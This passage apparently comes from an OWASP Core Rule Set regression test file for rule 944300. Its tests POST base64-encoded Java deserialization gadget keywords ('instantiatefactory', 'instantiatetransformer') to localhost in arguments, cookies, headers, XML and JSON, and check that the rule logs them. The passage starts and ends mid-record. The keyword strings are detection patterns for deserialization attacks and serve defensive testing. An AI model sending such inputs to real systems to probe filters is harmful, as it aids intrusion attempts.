"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-139 + desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-140 + desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-141 + desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-142 + desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-143 + desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-144 + desc: "Argument test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-145 + desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-146 + desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-147 + desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-148 + desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-149 + desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-150 + desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-151 + desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-152 + desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-153 + desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-154 + desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-155 + desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-156 + desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-157 + desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-158 + desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-159 + desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-160 + desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-161 + desc: "XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-162 + desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-163 + desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-164 + desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-165 + desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-166 + desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-167 + desc: "Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-168 + desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-169 + desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-170 + desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-171 + desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-172 + desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-173 + desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-174 + desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-175 + desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-176 + desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-177 + desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-178 + desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-179 + desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-180 + desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-181 + desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-182 + desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-183 + desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-184 + desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-185 + desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-186 + desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 